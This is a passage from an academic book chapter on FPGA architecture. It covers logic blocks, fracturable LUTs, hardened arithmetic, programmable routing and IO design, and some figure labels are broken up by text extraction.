on VLSI Design, VLSID 2015, Bangalore, 3–7 Jan 2015. IEEE Computer Society, pp 153–158
414 F. Merchant
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 418
Methodology and Tools for FPGA Architecture Evaluation . . . . . . . . . . . . . . . . . . . . . . . . . . . 420
Key FPGA Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 422
Programmable Logic Blocks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423
Programmable Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430
Programmable IO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435
Programmable Clock Distribution Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437
On-chip Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439
DSP Blocks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 447
Processor Subsystems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 453
System-Level Interconnect: Network-on-Chip . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455
Interposers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 457
Configuration and Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 460
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 460
Abstract
Since their inception more than thirty years ago, field-programmable gate arrays
(FPGAs) have grown more complex, more capable, and more diverse in their
applications. FPGAs can be reprogrammed at a fundamental level, changing
the function and interconnection of millions of elements. By reconfiguring
their hardware to match the application, FPGAs often achieve higher energy
efficiency, lower latency or faster time-to-market across a very wide range of
application domains. A modern FPGA combines many components, from logic
Keywords
Introduction
The idea of reconfigurable computing originated in the 1960s with the Fixed Plus
Variable Structure Computer (Estrin 1960), which aimed to enhance a conventional
computing system with the capability to temporarily morph into a more application-
specialized architecture. This would be achieved using additional programmable
logic and interconnect circuitry to implement operations beyond the capabilities of
the fixed datapath processor. A variety of research efforts subsequently investigated
ideas for reconfigurable computer architectures that could combine both software-
like flexibility and hardware efficiency. However, it was over 20 years later that the
first commercially successful reconfigurable computing device, known as a field-
programmable gate array (FPGA), was created by Xilinx in 1985.
As illustrated in Fig. 1, FPGAs consist of a two-dimensional array of pro-
grammable blocks (logic, IO, and others) that can be flexibly connected using a
network of pre-fabricated wires with programmable switches between them. The
functionality of all the FPGA blocks and the connectivity of routing switches are
controlled using millions of configuration bits, usually stored in static random
access memory (SRAM) cells, that can be configured to implement arbitrary digital
circuits. The designer describes the desired functionality in a hardware description
language (HDL) such as Verilog/VHDL or possibly uses high-level synthesis to
translate a higher-level programming language (e.g., C++ or OpenCL) to HDL. The
HDL design is then compiled using a complex computer-aided design (CAD) flow
into the bitstream file, analogous to a software program executable, which is used
to program all the FPGA’s configuration SRAM cells.
FPGAs combine aspects of general-purpose processors and application-specific
integrated circuits (ASICs). Their programmability allows a single FPGA to imple-
ment many different applications similar to a software-programmable processor,
while the fact that their hardware is reconfigurable enables custom systems similar
to an ASIC. However, FPGAs have a significantly lower non-recurring engineering
cost and shorter time-to-market since they do not require the physical design, layout,
fabrication, and verification stages that a custom ASIC would normally go through.
13 Field-Programmable Gate Array Architecture 419
PCIe Controller
Block
RAMs
Prog.
IOs Processor
Subsystem
level organization (e.g., number and type of blocks, distribution of wire segment
lengths, size of logic clusters and logic elements), to micro-architectural details
(e.g., DSP and BRAM modes of operation, hard arithmetic in logic blocks, switch
block patterns), and down to transistor-level circuit implementation (e.g., pro-
grammable switch type, routing buffer transistor sizing, register implementation). It
also involves different implementation styles; the logic blocks and programmable
routing are designed and laid out as full-custom circuits, while most hardened
blocks (e.g., DSPs) mix standard-cell and full-custom design for the block core
and peripherals, respectively. Some blocks, such as BRAMs and high-speed IO,
even include significant analog circuitry. All these different components need to
be carefully modeled to evaluate the FPGA architecture in its entirety. Tools
such as COFFE (Yazdanshenas and Betz 2019) were developed to automate the
transistor-level design and modeling of FPGA blocks and programmable routing
components, speeding up FPGA architecture investigations. The area, timing, and
power models for each of these components are then typically combined in an
architecture description file, along with a specification of how these blocks and
routing components are organized into the overall architecture.
Finally, a re-targetable CAD system such as the Verilog-to-Routing (VTR) flow
(Murray et al. 2020a) is used to map the selected benchmarks to the described FPGA
architecture. Such a CAD system consists of a sequence of complex optimization
algorithms that synthesizes a benchmark written in an HDL into a circuit netlist,
maps it to the different FPGA blocks, places the mapped blocks at specific
locations on the FPGA, and routes the connections between them using the specified
programmable routing architecture. The implementation produced by the CAD
system is then used to evaluate several key metrics. Total area is the sum of the areas
of the FPGA blocks used by the application, along with the programmable routing
included with them. A timing analyzer finds the critical path(s) through the blocks
and routing to determine the maximum frequencies of the application’s clocks.
Power consumption is estimated based on resources used and signal toggle rates.
FPGAs are never designed for only one application, so these metrics are averaged
across all the benchmarks. Finally, the overall evaluation blends these average area,
delay, and power metrics appropriately depending on the architecture goal (e.g., high
performance or low power). Other metrics such as CAD tool runtime and routability
of the benchmarks on a candidate architecture are also often considered.
As an example, a key set of questions in FPGA architecture is: What functionality
should be hardened (i.e., implemented as a new ASIC-style block) in the FPGA
architecture? How flexible should this block be? How much of the FPGA die area
should be dedicated to it? Ideally, an FPGA architect would like the hardened
functionality to be usable by as many applications as possible at the least possible
silicon cost. An application that can make use of the hard block will benefit by being
smaller, faster and more power-efficient than a soft implementation that uses only
the programmable logic and routing. This motivates having more programmability
in the hard block to capture more use cases; however, higher flexibility generally
comes at the cost of larger area and reduced efficiency of the hard block. On the
other hand, if a hard block is not usable by an application circuit, its silicon area is
422 A. Boutros and V. Betz
wasted; the FPGA user would rather have more of the usable general-purpose logic
blocks in the area of the unused hard block. The impact of this new hard block on
the programmable routing must also be considered – does it need more interconnect
or lead to slow routing paths to and from the block? To evaluate whether a specific
functionality should be hardened or not, both the cost and gain of hardening it have
to be quantified empirically using the flow described in this section. FPGA architects
may try many ideas before landing on the right combination of design choices that
adds just the right amount of programmability to make this new hard block a net win.
In the rest of this chapter, we detail many different components of FPGAs and
key architecture questions for each. While we describe the key results without
detailing the experimental methodology used to find them, in general they came
from a holistic architecture evaluation flow similar to that in Fig. 2.
In this section, we present some of the key application domains of FPGAs and
highlight their advantages for use cases in these areas.
Wireless communications and (e.g., cell phone base stations) is a very large
market for FPGAs. The reconfigurability of FPGAs allows service providers to
implement a range of different standards and upgrade them in-field, while achieving
much higher energy efficiency compared to instruction-set-based DSP devices.
One of the key components in wireless communications is signal processing,
such as filtering. The direct hardware execution (without an instruction stream)
of FPGAs makes them very efficient for repetitive tasks of this nature. Table 1
compares the performance, power and energy efficiency of a Stratix IV FPGA to
two Texas Instruments DSP devices (scaled optimistically to the same 40 nm process
technology of the FPGA) when implementing simple signal filtering using a 51-tap
finite impulse response (FIR) filter. The results show that even a single instance of
the FIR filter (consuming only 2% of the FPGA resources) can achieve two orders of
magnitude higher performance compared to both DSPs, and 7.7× and 63.2× higher
energy efficiency compared to the C5505 and C674x, respectively. The FPGA can
achieve another order of magnitude higher performance by instantiating up to 49
instances of the FIR filter working in parallel at the cost of only 9× higher power
consumption since the FPGA static power (80% of the FPGA power in Table 1)
remains the same regardless of the amount of utilized resources.
Table 1 Performance, power, and energy efficiency comparison between a Stratix IV FPGA and
two DSP devices. The results of the DSPs are optimistically scaled to the FPGA’s 40 nm process
technology
Device Performance (Samples/s) Power (mW) Energy efficiency (Samples/W)
TI C5505 1.77 × 106 28 6.32 × 107
TI C674x 3.21 × 106 416 7.72 × 106
Stratix IV GX230 5.1 × 108 1046 4.88 × 108
13 Field-Programmable Gate Array Architecture 423
Wired communications and networking are also heavy users of FPGAs. The
richness and diversity of FPGA IOs are important in this use case, as many
different and very high-speed IO standards are used in chip-to-chip, server-to-
server and city-to-city communications. FPGAs are often used in high-end packet
processing and switching systems, which have a high degree of parallelism and a
need for high throughput and low latency (Zhao et al. 2020). This is well-suited to
an FPGA’s spatial architecture and the ability to customize processing pipelines
to the bare minimum required by the target application to reduce latency compared
to general-purpose processors with a fixed pipeline and memory hierarchy. The
hardened network transceivers in modern FPGAs along with the ability to
customize the network stack implementation also make FPGAs suitable for ultra-
low latency networking interfaces. This can also be useful in other domains,
including financial applications such as high-frequency trading (Lockwood et al.
2012) where FPGA reprogrammability allows integration of the rapidly changing
trading algorithms on the same chip as the low-latency networking interface.
More recently, FPGAs have also been deployed on a large scale in datacenters
where both their computation and networking capabilities are leveraged. The
Microsoft Catapult project couples every CPU server with an FPGA that can be
used to accelerate search engines, packet processing, encryption and compression
(Putnam et al. 2014; Caulfield et al. 2016). This achieved a 95% improvement in
the ranking throughput of their search engine infrastructure at the cost of only
10% higher power consumption. The network-connected FPGAs in the Catapult
project were also used to implement Brainwave, a datacenter-scale deep learning
accelerator for real-time low-latency inference (Fowers et al. 2018).
The hardware reprogrmmability of FPGAs has led to their extensive use in
ASIC prototyping (Krupnova and Saucier 2000), where either a part or the entirety
of an ASIC design is emulated on FPGAs to verify functionality or estimate
performance before fabrication. There are a myriad of other application domains
for FPGAs including embedded real-time video processing in autonomous vehicles
(Rettkowski et al. 2017), genomics (Turakhia et al. 2018), biophotonic simulations
(Young-Schultz et al. 2020), accelerated RTL simulation (Karandikar et al. 2018),
and many more.
These diverse applications are enabled by the various components of an FPGA
architecture working together, and in the following sections we detail the architec-
ture of each of these components.
AND array
Outputs O0 O1 O2 O3
flexibly configured to select the inputs to each of the AND/OR gates to implement
different Boolean expressions. The design tools for PALs were very simple since the
delay through the device is constant regardless of the logic function implemented.
However, PALs did not scale well; as device logic capacity increased, the wires
connecting the AND/OR grid became increasingly longer and slower and the number
of required programmable switches grew quadratically.
Subsequently, complex programmable logic devices (CPLDs) kept the AND/OR
arrays as the basic logic elements, but attempted to solve the scalability challenge
by integrating multiple PALs on the same die with a crossbar interconnect between
them at the cost of more complicated design tools. Shortly after, Xilinx pioneered
the first FPGA in 1985, which consisted of an array of SRAM-based lookup tables
(LUTs) with programmable interconnect between them. This style of reconfigurable
devices was shown to scale very well, with LUTs achieving much higher area
efficiency compared to the AND/OR logic in PALs and CPLDs. Consequently,
LUT-based architectures became increasingly dominant and today LUTs form the
fundamental logic element in all commercial FPGAs. Some research attempts
investigated replacing LUTs with a different form of configurable AND gates: a full
binary tree of AND gates with programmable output/input inversion known as an
AND-inverter cone (AIC) (Parandeh-Afshar et al. 2012). However, when thoroughly
evaluated in Zgheib et al. (2014), AIC-based FPGA architectures had significantly
larger area than LUT-based ones, with delay gains only on small benchmarks that
have relatively short and localized critical paths.
A K-LUT can implement any K-input Boolean function by storing its truth
table in 2K configuration SRAM cells. Figure 4a shows the transistor-level circuit
implementation of a 4-LUT using pass-transistor logic. The four inputs (A, B, C,
and D) are used as multiplexer select lines to choose an output from the 16 values
13 Field-Programmable Gate Array Architecture 425
Vdd
Vdd
Internal Buffers
b
K inputs
K-LUT Ofeedback
…
Oroung
Basic Logic Element (BLE)
of the truth table in the SRAMs. In addition to the output buffer, an internal
buffering stage (shown between the second and third stages of the LUT in Fig. 4a)
is typically implemented to mitigate the quadratic increase in delay when passing
through a chain of pass-transistors. The sizing of the LUT’s pass-transistors and
the internal/output buffers is carefully tuned to achieve the best area-delay product.
Classic FPGA literature (Betz et al. 1999) defines the basic logic element (BLE)
as a K-LUT coupled with an output register and 2:1 bypassing multiplexers as
shown in Fig. 4b. Thus, a BLE can be used to implement just a flip-flop (FF)
with the LUT configured as an identity function, or any Boolean expression with
up to K inputs and optionally-registered output. As illustrated in Fig. 5a, BLEs
are typically clustered in logic blocks (LBs), such that an LB contains N BLEs
along with local interconnect. The local interconnect in the logic block consists
of multiplexers between signal sources (BLE outputs and logic block inputs) and
destinations (BLE inputs). These multiplexers are often arranged to form a local
full (Betz and Rose 1998) or partial (Lemieux et al. 2000) crossbar. At the circuit
level, these multiplexers are usually built as two levels of pass transistors, followed
by a two-stage buffer as shown in Fig. 5b; this is the most efficient circuit design
for FPGA multiplexers in most cases (Chiasson and Betz 2013a). Figure 5a also
shows the switch and connection block multiplexers forming the programmable
routing used for inter-LB communication; this routing is discussed in detail in
the “Programmable Routing” section.
426 A. Boutros and V. Betz
…
BLE 1 … …
…
…
…
BLE 2
…
…
…
Oroung
…
BLE N
…
…
Logic Block (LB)
Vercal
… I inputs Roung
… Connecon Block
… Mulplexers
Horizontal
Roung
b
1st level SRAMs
I00 I01 … I0N Output
Buffer
I10 I12 … I1N Vdd
2nd level
Over the years, the size of LUTs (K) and LBs (N ) have gradually increased
with growing device logic capacity. As K increases, more functionality can be
captured into a single LUT. Therefore, the same circuit can be implemented using
fewer LUTs with a smaller number of logic levels on the critical path, which
increases performance. In addition, the demand for inter-LB routing decreases as
more connections are captured into the fast local interconnect by increasing N. On
the other hand, the area of the LUT increases exponentially with K (due to the 2K
SRAM cells) and its speed degrades linearly (due to propagation through a chain
of K pass transistors with periodic buffering). The size of the local crossbar also
increases quadratically and its speed degrades linearly with increasing N . Ahmed
and Rose (2004) empirically evaluated these trade-offs and found that LUTs of size
4–6 and LBs of size 3–10 BLEs offer the best area-delay product for an FPGA
architecture, with 4-LUTs leading to a better area but 6-LUTs yielding a higher
speed. Historically, the first Xilinx FPGAs had an LB with only two 3-LUTs (i.e.,
N = 2, K = 3). LB size gradually increased over time and by 1999, Xilinx’s Virtex
family had four 4-LUTs and Altera’s Apex 20K family had ten 4-LUTs in each LB.
The next major logic feature was the fracturable LUTs introduced in 2003 by
Altera in their Stratix II architecture. Ahmed and Rose in (2004) showed that
13 Field-Programmable Gate Array Architecture 427
an LB with ten 6-LUTs achieved 14% better performance but increased area by
17% compared to an LB with ten 4-LUTs. In addition, an architecture with only
6-LUTs can suffer from significant under-utilization. Lewis et al. found that 64%
of the LUTs implemented for a commercial benchmark suite used fewer than
6 inputs, wasting some of the 6-LUT functionality (Lewis et al. 2005). Based on
these observations, fracturable LUTs were introduced to combine the best of both
worlds: the higher performance of larger LUTs and the superior area-efficiency of
smaller ones. A fracturable {K, M}-LUT can be configured as a single LUT of size
K or can be fractured into two LUTs of size up to K −1 that collectively use no more
than K + M distinct inputs. Figure 6a shows that a 6-LUT is internally composed
of two 5-LUTs plus a 2:1 multiplexer. Consequently, almost no circuitry (only the
red added output) is necessary to allow a 6-LUT to instead operate as two 5-LUTs
that share the same inputs. However, this requires the two 5-LUTs to share all their
inputs which limits how often both LUTs can be simultaneously used. Adding extra
routing ports as shown in Fig. 6b relaxes this constraint and makes it easier to find
two logic functions that can be packed together into a fracturable 6-LUT at the cost
of slightly increasing its area. The adaptive logic module (ALM) in the Stratix II
architecture implemented a {6, 2}-LUT that had 8 input and 2 output ports. Thus, an
ALM can implement a 6-LUT or two 5-LUTs sharing 2 inputs (and therefore a total
of 8 distinct inputs). Pairs of smaller LUTs could also be implemented without any
shared inputs, such as two 4-LUTs or one 5-LUT and one 3-LUT. With a fracturable
6-LUT, larger logic functions are implemented in 6-LUTs reducing the logic levels
on the critical path and achieving better performance. On the other hand, pairs of
smaller logic functions can be packed together (each using only half an ALM),
improving area-efficiency. The LB in Stratix II not only increased the performance
by 15%, but also reduced the logic and routing area by 2.6% compared to a baseline
4-LUT-based LB (Lewis et al. 2005).
Xilinx later adopted a similar approach in their Virtex-5 architecture in which
the 6-LUTs can also be decomposed into two 5-LUTs. However, they adopted a
LUT architecture similar to that shown in Fig. 6a with minimal changes compared
to the traditional 6-LUT (i.e., no extra input routing ports or steering multiplexers).
a b
G
5-LUT
H O2
5-LUT
O2
0 O1
0 O1
1
1 A
A
5-LUT
B
B
5-LUT
C
C D
D E
E
F 1
F 6-LUT 6-LUT
Fig. 6 6-LUT fracturable into two 5-LUTs with (a) no additional input ports, leading to 5 shared
inputs or (b) two additional input ports and steering multiplexers, leading to only 2 shared inputs
428 A. Boutros and V. Betz
This results in a lower area per fracturable LUT, but makes it more difficult to pack
two smaller LUTs together as they must use no more than 5 distinct inputs. While
subsequent architectures from both Altera/Intel and Xilinx have also been based
on fracturable 6-LUTs, recent work from Microsemi (Feng et al. 2018) revisited
the 4-LUT vs. 6-LUT efficiency trade-off for newer process technologies, CAD
tools and designs than those used in Ahmed and Rose (2004). It shows that a
LUT structure with two tightly coupled 4-LUTs, one feeding the other, can achieve
performance close to conventional 6-LUTs while maintaining the high utilization
and area efficiency of 4-LUTs. In terms of LB size, FPGA architectures from
Altera/Intel and Xilinx converged on the use of relatively large LBs with ten and
eight BLEs respectively, for several generations. However, the Versal architecture
from Xilinx further increases the number of BLEs per LB to thirty two (Gaide
et al. 2019). This significant increase in LB size is motivated by two main factors.
First, inter-LB wire delay is scaling poorly with process shrinks, so capturing more
connections within an LB’s local routing is increasingly beneficial. Second, ever-
larger FPGA designs tend to increase CAD tool runtime, but larger LBs can mitigate
this trend by simplifying placement and inter-LB routing.
The number of FFs per BLE and the circuit-level FF implementation are other
important architecture choices. Early FPGAs with non-fracturable LUTs had a
single FF to optionally register the LUT output as shown in Fig. 4b. When they
moved to fracturable LUTs, both Altera/Intel and Xilinx architectures added a
second FF to each BLE so that both outputs of the fractured LUT could be
registered, as shown in Fig. 6a and b. In the Stratix V architecture, the number of
FFs was doubled (i.e., four FFs per BLE) to accommodate the increasing demand
for FFs as designs became more deeply pipelined to achieve higher performance
(Lewis et al. 2013). Low-cost multiplexing circuitry allows sharing the existing
inputs between the LUTs and FFs to avoid adding more costly routing ports. Stratix
V also implements FFs as pulse latches instead of edge-triggered FFs. As shown
in Fig. 7b, this removes one of the two latches that would be present in a master-
slave FF (Fig. 7a), reducing the register delay and area. A pulse latch acts as a
cheaper FF with worse hold time as it latches the data input during a very short
pulse instead of a clock edge as in conventional FFs. However, it would be area-
inefficient to build a pulse generator for each latch. Instead, this cost is amortized
QLatch
clk clk cpulse
Fig. 7 Circuitry for (a) Master-slave positive-edge-triggered FF, and (b) Pulse latch
13 Field-Programmable Gate Array Architecture 429
by implementing only two configurable pulse generators per LB; each of the
40 pulse latches in an LB selects which generator provides its pulse input. The
FPGA CAD tools can also program the pulse width in these generators, allowing a
limited amount of time borrowing between source and destination registers. Soon
after, the Xilinx Ultrascale+ architecture also adopted the use of pulse latches as its
FFs due to their area and speed benefits (Ganusov and Devlin 2016).
Murray et al. found that 22% of logic elements in the Titan suite of benchmarks
implemented addition or subtraction (Murray et al. 2020b). When implemented with
LUTs, each bit of arithmetic in a ripple carry adder requires two LUTs, one for
generating the sum and another for the carry. This is inefficient as it results in high
logic utilization and a slow critical path due to having many cascaded LUTs in
series for computing the carries in multi-bit additions. Consequently, all modern
FPGA architectures include hardened arithmetic circuitry in their LBs. There are
many variants, but all have several common points. First, to avoid adding expensive
routing ports, the arithmetic circuits re-use the LUT routing ports or are fed by
the LUT outputs. Second, the carry bits are propagated on a special, dedicated
interconnect with little or no programmability so that the crucial carry path is fast.
The lowest cost arithmetic circuitry hardens ripple carry structures and achieves
a large speed gain over LUTs (3.4× for a 32-bit adder in Murray et al. 2020b).
Hardening more sophisticated structures like carry skip adders further improves
speed (an additional 20% speed-up at 32 bits in Yazdanshenas and Betz 2019).
The latest Versal architecture from Xilinx (Gaide et al. 2019) hardens the carry
logic for 8-bit carry look-ahead adders (i.e., the addition can only start on every
eighth BLE), while the sum, propagate and generate logic is all implemented in the
fracturable 6-LUTs feeding the carry logic as shown in Fig. 8a. This organization
allows implementing 1-bit of arithmetic per logic element. On the other hand,
the latest Intel Agilex architecture can implement two bits of arithmetic per logic
gen
A[i]
4- LUT 4- LUT
Sum[ i] Sum[ i]
A[i] B[i]
B[i] 4- LUT 4- LUT
Fig. 8 Overview of the hard arithmetic circuitry (in red) in the logic elements of (a) Xilinx and
(b) Altera/Intel FPGAs. A[i] and B[i] are the ith bits of the two addition operands A and B. The
Xilinx logic elements compute carry propagate (prop) and generate (gen) in the LUTs, while the
Altera/Intel ones use LUTs to pass inputs to the hard adders. Unlabeled inputs are unused when
implementing adders
430 A. Boutros and V. Betz
element, with a dedicated interconnect for the carry as shown in Fig. 8b. It achieves
that by hardening 2-bit carry-skip adders that are fed by the four 4-LUTs contained
within a fracturable 6-LUT (Chromczak et al. 2020). The study by Murray et al.
(2020b) shows that the combination of fracturable LUTs and 2 bits of arithmetic
(similar to that adopted in Altera/Intel FPGAs) is particularly efficient compared to
architectures with non-fracturable LUTs or 1 bit of arithmetic per logic element.
It also concludes that having dedicated arithmetic circuits (i.e., hardening adders
and carry chains) inside the FPGA logic elements increases average performance
by 75% and 15% for arithmetic microbenchmarks and general benchmark circuits,
respectively.
Recently, deep learning (DL) has become a key workload in many end-user
applications, with its core operation being multiply-accumulate (MAC). Generally,
MACs can be implemented in DSP blocks as will be described in the “DSP Blocks”
section; however, low-precision MACs with 8-bit or narrower operands (which
are becoming increasingly popular in DL workloads) can also be implemented
efficiently in the programmable logic (Caulfield et al. 2016). In this case, LUTs
implement AND gates to generate partial products followed by an adder tree to
reduce the partial products and perform the accumulation. Consequently, multiple
recent studies (Rasoulinezhad et al. 2020; Eldafrawy et al. 2020) have investigated
increasing the density of hardened adders in the FPGA’s logic fabric to enhance
its performance when implementing arithmetic-heavy applications such as DL. The
work in Eldafrawy et al. (2020) proposed multiple different logic block architectures
that incorporate 4 bits of arithmetic per logic element arranged in one or two
carry chains with different configurations, instead of just 2 bits of arithmetic in
an Intel Stratix-like ALM. These proposals do not require increasing the number
of the (relatively expensive) routing ports in the logic clusters when implementing
multiplications due to the high degree of input sharing in a multiplier array (i.e.,
for an N -bit multiplier, only 2N inputs are needed to generate N 2 partial products).
The most promising of these proposals increases the density of MAC operations by
1.7× while simultaneously improving their speed. It also reduces the required logic
and routing area by 8% for general benchmarks, highlighting that more arithmetic
density is beneficial for applications beyond DL.
Programmable Routing
Programmable routing commonly accounts for 50% or more of the fabric area and
the critical path delay of applications (Chiasson and Betz 2013b), so its efficiency
is crucial. Programmable routing is composed of pre-fabricated wire segments
connected via programmable switches. By programming an appropriate sequence
of switches to be on, a connection can be formed between any two function
blocks. There are two main classes of FPGA routing architecture. Hierarchical
FPGAs are inspired by the fact that designs are inherently hierarchical; higher-
level modules instantiate lower-level modules and connect signals between them,
with communication being more frequent between modules that are near each other
in the design hierarchy. As shown in Fig. 9, hierarchical FPGAs can realize these
13 Field-Programmable Gate Array Architecture 431
LB LB LB LB
Switch Switch
Box Box
LB LB LB LB
Switch Box
LB LB LB LB
Switch Switch
Box Box
LB LB LB LB
connections with short wires that connect small regions of the chip. To communicate
to more distant regions, a connection (highlighted in red) passes through multiple
wires and switches as it traverses different levels of the interconnect hierarchy.
This style of architecture was popular in many earlier FPGAs, such as Altera’s
Flex and Apex families, but it leads to very long wires at the upper levels of the
interconnect hierarchy which became problematic as process scaling made such
wires increasingly resistive. A strictly hierarchical routing architecture also results
in some blocks that are physically close together (e.g., the blue blocks in Fig. 9)
which still require several wires and switches to connect. Consequently, this routing
architecture is primarily used today for smaller FPGAs, such as the FlexLogix
FPGA IP cores that can be embedded in larger SoC designs.
The other type of FPGA interconnect is island-style, as depicted in Fig. 10.
This architecture was pioneered by Xilinx and is inspired by the fact that a
regular two-dimensional layout of horizontal and vertical directed wire segments
can be efficiently laid out. As shown in Fig. 10, island-style routing includes three
components: routing wire segments, connection blocks (multiplexers) that connect
function block inputs to the routing wires, and switch blocks (programmable
switches) that connect routing wires together to realize longer routes. The placement
engine in FPGA CAD tools chooses which function block implements each
element of a design in order to minimize the required wiring. Consequently, most
connections between function blocks span a small distance and can be implemented
with a few routing wires as illustrated by the red connection in Fig. 10.
432 A. Boutros and V. Betz
LB LB LB
LB LB LB
Fig. 10 Island-style routing architecture. Thick solid lines are routing wires while dashed lines
are programmable switches. Connection and switch blocks are shaded in yellow and green,
respectively
resulted in more programmable switches than necessary, and that making all wiring
segments span four logic blocks before terminating reduced application delay by
40% and routing area by 25% (Betz and Rose 1999). Modern architectures include
multiple lengths of wiring segments to better match the needs of short and long
connections, but the most plentiful wire segments remain of moderate length, with
four logic blocks being a popular choice. Longer distance connections can achieve
lower delay using longer wire segments, but in recent process nodes wires that span
many (e.g., 16) logic blocks must use wide and thick metal traces on upper metal
layers to achieve acceptable resistance (Petelin and Betz 2016). The amount of such
long-distance wiring one can include in a metal stack is limited. To best leverage
such scarce wiring, Intel’s Stratix FPGAs allow long wire segments to be connected
only to short wire segments, rather than function block inputs or outputs (Lewis
et al. 2003). This creates a form of routing hierarchy within an island-style FPGA,
where short connections use only the shorter wires, but longer connections pass
through short wires to reach the long wire network. Another area where hierarchical
FPGA concepts are used within island-style FPGAs is within the logic blocks. As
illustrated in Fig. 5a, most logic blocks now group multiple BLEs together with local
routing. This means that each logic block is a small cluster in a hierarchical FPGA;
island-style routing interconnects the resulting thousands of logic clusters.
There has been a great deal of research into the optimal amount of switching,
and how to best arrange the switches. While there are many detailed choices, a few
principles have emerged. The first is that the connectivity between function block
pins and wires (Fc ) can be relatively low: typically only 10% or less of the wires that
pass by a pin will have switches to connect to it. Similarly, the number of other wires
that a routing wire can connect to at its end (Fs ) can also be low, but it should be at
least 3 so that a signal can turn left, right, or go straight at a wire endpoint. The local
routing in a logic cluster (described in the “Programmable Logic Blocks” section)
allows some block inputs and some block outputs to be swapped during routing
(i.e., general programmable routing can deliver a signal to one of several input
pins, which can then be routed to the right LUT input using the local crossbar). By
leveraging this extra degree of flexibility and considering all the options presented
by the multi-stage programmable routing network, the routing CAD tool can achieve
high completion rates even with low Fc and Fs values. Switch patterns that give
more options to the routing CAD tool also help routability; for example, the Wilton
switch pattern ensures that following a different sequence of channels lets the
router reach different wire segments near a destination block (Tang et al. 2019).
Some recent architectures have also created L-shaped routing segments (formed by
shorting a horizontal and vertical metal segment together) that allow connections
between diagonally nearby blocks with fewer routing switches (Sivaswamy et al.
2005; Petersen et al. 2021).
There are also multiple options for the electrical design of programmable
switches, as shown in Fig. 11. Early FPGAs used pass gate transistors controlled
by SRAM cells to connect wires. While this is the smallest switch possible, the
delay of routing wires connected in series by pass transistors grows quadratically,
434 A. Boutros and V. Betz
Configuration
SRAMs
making them very slow for large FPGAs. Adding some tri-state buffer switches
costs area, but improves speed (Betz and Rose 1999). Most recent FPGAs primarily
use a multiplexer built out of pass gates followed by a buffer that cannot be tri-
stated, as shown in detail in Fig. 5b. The pass transistors in this direct drive switch
can be small as they are lightly loaded, while the buffer can be larger to drive the
significant capacitance of a routing wire segment. Such direct drive switches create
a major constraint on the switch pattern: a wire can only be driven at one point, so
only function block outputs and routing wires near that point can feed its routing
multiplexer inputs and hence be possible signal sources. Despite this constraint,
both academic and industrial work has concluded that direct drive switches improve
both area and speed due to their superior electrical characteristics (Lewis et al. 2003;
Lemieux et al. 2004). The exception is expensive or rare wires such as long wires
implemented on wide metal traces on upper metal layers or the interposer-crossing
wires discussed later in the “Interposers” section. These wires often have multiple
tri-state buffers that can drive them, as the cost of these larger programmable
switches is merited to allow more flexible usage of these expensive wires.
A major challenge for FPGA routing is that the delay of long wires is not
improving with process scaling, which means that the delay to cross the chip
is stagnating or increasing even as clock frequencies rise. This has led FPGA
application developers to increase the amount of pipelining in their designs, thereby
allowing multiple clock cycles for long routes. To make this strategy more effective,
some FPGA manufacturers have integrated registers within the routing network
itself. Intel’s Stratix 10 device allows each routing driver (i.e., multiplexer followed
by a buffer) to be configured as a pulse latch as shown in Fig. 7b, thereby acting as
a register with low delay but relatively poor hold time. This allows deep pipelining
of interconnect without using expensive logic resources, at the cost of a modest
area and delay increase to the routing driver (Lewis et al. 2016). However, their
poor hold time means using pulse latches in immediately consecutive Stratix 10
routing switches would lead to hold time violations, so not all of these interconnect
registers can be simultaneously used. Therefore, Intel refined this approach in their
Agilex devices by integrating actual registers (with better hold time) on only one-
third of the interconnect drivers to mitigate the area cost (Chromczak et al. 2020).
Rather than integrating registers throughout the interconnect, Xilinx’s Versal devices
instead add bypassable registers only on the inputs to function blocks. Unlike Intel’s
interconnect registers, these input registers are full-featured, with clock enable and
clear signals (Gaide et al. 2019).
13 Field-Programmable Gate Array Architecture 435
Programmable IO
Vddio1
Impedance
+
Control
Out
In2 PDC - In
Fig. 12 Overview of the different techniques for implementing programmable IOs in FPGAs
436 A. Boutros and V. Betz
FPGAs use IO buffers that can operate across a range of voltages. As shown in 1 ,
these IOs are grouped into banks (commonly on the order of 50 IOs per bank), where
each bank has a separate Vddio rail for the IO buffers. This allows different banks to
operate at different voltage levels. For example, IOs in one bank could be operating
at 1.8 V while those in a different bank operate at 1.2 V. Second, each IO can be
used separately for single-ended standards, or pairs of IOs can be programmed to
implement the positive and negative lines for differential IO standards as in 2 .
Third, IO buffers are implemented with multiple parallel pull-up and pull-down
transistors so that their drive strengths can be programmably adjusted by enabling
or disabling different numbers of pull-up/pull-down pairs. This is illustrated in part
3 of Fig. 12. By programming some pull-up or pull-down transistors to be enabled
even when no output is being driven, FPGA IOs can minimize signal reflections
by implementing different on-chip termination resistances. Programmable delay
chains, shown in 4 , provide a fourth level of configurability, allowing fine delay
adjustments of signal timing to and from the IO buffer.
In addition to electrical and timing programmability, FPGA IO blocks contain
